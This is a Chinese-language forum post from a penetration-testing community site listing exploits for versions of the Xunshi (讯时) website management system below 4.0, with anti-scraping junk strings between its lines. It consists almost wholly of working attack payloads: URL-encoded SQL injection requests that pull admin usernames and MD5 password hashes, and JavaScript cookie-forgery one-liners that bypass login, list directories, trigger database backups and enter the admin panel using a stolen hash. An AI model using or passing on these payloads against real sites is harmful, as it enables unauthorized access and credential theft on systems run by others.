中国网络渗透测试联盟
标题:
讯时网站管理系统4.0以下漏洞
[打印本页]
作者:
admin
时间:
2016-5-11 14:55
标题:
讯时网站管理系统4.0以下漏洞
一、注入
+ O" }' c% V d( d5 I( `
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
1 w& E* i* ^$ o% E: o6 ^" v
( v- Y" J5 x% N. D( G1 }* B1 E
2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
2 @& {; J$ x. G7 N, u+ X
第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
4 a( r# K* a0 D5 h5 Y X/ h' H
可得到用户名和MD5加密码的密码。
& c2 @- y$ q7 u8 e
* c. z Z0 U# ?9 _% E+ N7 b
二、cookies欺骗
0 E5 l. x* x3 M1 |" P: V6 B/ O
2 q: Q l% B' D5 y8 i6 A* t( P
1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞.
d7 o5 }, \6 X: C# `# y8 E$ o
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
! ^3 l- ] P+ ~$ B! _6 M4 D1 @
9 w* s! K3 H# R( Z' ?# I3 s
2、列目录.
; L; z" L3 i9 w5 h' [. [) V
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."
0 y5 G' @2 S( t) N& j
9 f1 r% Z$ h. C2 A/ a: J
3、数据库备份(适用性好像比较低.)
* F( c5 u3 \, k
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
# R: x( U$ O% _( x& c/ T7 ^3 X5 B E5 N
( S, a' h$ b; r+ {8 `( C+ }
4、得到MD5密码解不了密进后台方法
2 J: J8 `7 z5 R. Y8 C
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
. F! G; y3 }, u5 L6 s3 C3 U( i2 W
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2